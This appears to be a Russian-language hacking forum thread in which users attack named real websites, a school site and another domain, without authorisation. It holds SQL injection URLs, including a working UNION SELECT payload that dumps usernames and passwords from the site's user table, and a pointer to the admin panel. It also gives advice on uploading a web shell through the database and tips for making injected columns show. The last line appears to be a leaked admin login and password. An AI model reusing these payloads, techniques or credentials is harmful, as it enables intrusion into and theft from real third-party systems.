так, во первых, скажите мне, пожалуйста, где здесь одминка? :) :http://sofs.ru

во-вторых:
http://gym1517.ru/download.php?key=1+order+by+4
делаю юнион+1,2,3,4 - ошибка все равно вылезает
http://gym1517.ru/index.php?page=online&msg=18+order+by+7
делаю юнион - ни одного поля.
что делать? xD

http://gym1517.ru/index.php?page=online&msg=18+and(1=2)+union+select+1,concat(username,0x3 a,passwd),3,4,5,6,7+from+user/*

http://gym1517.ru/admin/

наслаждайся :)

На http://sofs.ru нашел только phpMyAdmin:

http://sofs.ru/phpMyAdmin/ , что логично))

Ну если прав хватит на mysql.user (если у тебя там скуля) то через БД зальешь шелл :)

З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? :) Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)

наслаждайся :)

На http://sofs.ru нашел только phpMyAdmin:

, что логично))

я тож нашел, но юзвер и пасс не подходят туда.
З.Ы. на будущее: Если поля сами по себе не появились, нужно сделать ошибку в синтаксисе запроса, как например здесь 1=2, ведь 1 не равно 2? :) Или просто минус поставить, т.е. msg=-18 или msg[]=18 (иногда прокатывает), или msg=999999999999999, т.е. число, которого нет в БД. Ну вообщем понятно)

тут фишка-то в том, что отчеты об ошибках отключены. линк, который ты мне дал - пустая страница... а вообще спасибо :)

Ты бы пробелы убрал, хекер)

admin507:gym1517admin